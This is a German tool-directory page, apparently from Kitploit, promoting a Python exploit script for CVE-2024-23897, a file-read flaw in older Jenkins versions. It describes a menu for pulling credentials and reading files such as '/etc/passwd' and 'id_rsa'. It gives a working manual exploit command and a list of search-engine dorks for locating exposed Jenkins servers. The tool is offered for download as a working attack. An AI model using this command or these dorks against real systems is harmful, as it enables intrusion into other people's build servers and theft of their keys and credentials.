Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/pulentoski/cve-2024-23897-arbitrary-file-read
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubpulentoski/cve-2024-23897-arbitrary-file-read

CVE-2024-23897-Arbitrary-file-read

Ein in Python geschriebenes Skript zur Automatisierung der Schwachstelle CVE-2024-23897

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
vor 1 JahrNoch nicht geprüft
Teilen

🤵🏻 CVE-2024-23897 Arbitrary-file-read 🤵🏻


Betroffene Versionen:

  • Jenkins 2.441 und früher.
  • Jenkins LTS 2.426.2 und früher.

Ein in Python geschriebenes Skript zur Automatisierung der Schwachstelle CVE-2024-23897 🤖 🛠️

Dieser Python-Code stellt einen Scanner für eine spezifische Schwachstelle (CVE-2024-23897) in Jenkins-Servern dar. Er beginnt damit, den Benutzer nach der URL des Jenkins-Servers zu fragen.

Dann bietet er die Option, die Datei "jenkins-cli.jar" herunterzuladen, die für die Interaktion mit Jenkins über die Befehlszeile erforderlich ist. Danach präsentiert er ein Menü mit Optionen, die das Ausführen von Befehlen wie das Abrufen von Serverinformationen, Umgebungsinformationen, Jenkins-Konfigurationsinformationen, Benutzerinformationen, Anmeldeinformationen sowie das Lesen sensibler Dateien wie "/etc/passwd", "/etc/os-release" und "id_rsa" umfassen.

Sobald eine Option aus dem Menü ausgewählt wird, wird der entsprechende Befehl auf dem angegebenen Jenkins-Server ausgeführt. Der Code ist mit Funktionen zum Herunterladen der Datei und zum Ausführen der Befehle strukturiert, sowie einer Hauptfunktion zur Steuerung des Programmablaufs.

Ausführung für Jenkins-Server 📝:

root@kitploit:~
python3 CVE-2024-23897-A-scaner.py 

Ausführung für Jenkins-Server IN DOCKER 📝:

root@kitploit:~
python3  CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------

Manuelle Ausführung.

1- herunterladen jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar

2- um LFI durchzuführen, ausführen: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"


dork list:

intitle:"Dashboard [Jenkins]" inurl:"/login"

intitle:"Jenkins" "Dashboard"

inurl:"/computer/" intitle:"Jenkins"

inurl:"/script" intitle:"Jenkins"

"Jenkins [Jenkins]" intitle:"Login"

intitle:"Jenkins" "Jenkins ver. 2.441"

inurl:"/manage" intitle:"Jenkins"

site:.com intitle:"Jenkins"

site:aws.amazon.com intitle:"Jenkins"

filetype:xml inurl:"jenkins/config.xml"

Tool herunterladen